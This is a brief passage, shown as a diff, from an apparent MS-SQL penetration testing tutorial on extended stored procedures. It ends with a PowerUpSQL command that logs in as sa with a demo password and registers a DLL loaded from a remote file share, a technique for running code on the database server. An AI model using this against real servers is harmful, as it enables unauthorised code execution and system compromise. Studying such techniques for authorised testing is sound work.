MS-SQL Penetration Testing

 Register the dll from our system

-In order to create or register an extended stored procedure, the login that the user uses to log into the database must be a member of the sysadmin fixed server role.
+To create or register an extended stored procedure, the user login must belong to the sysadmin fixed server role.

-Typically, an extended stored procedure would be created with a name starting with xp_ or sp_ so that the database engine would automatically look in the master database for the object if there was no object with that name in the user database.
+Typically, users create an extended stored procedure with a name starting with xp_ or sp_.
+This way, the database engine automatically looks in the master database if it doesn’t find the object in the user database.

 Get-SQLQuery -UserName sa -Password Password@1 –Instance WIN-P83OS778EQK\SQLEXPRESS –Query "sp_addextendedproc 'xp_calc', '\\192.168.1.145\fileshare\xp_calc.dll'"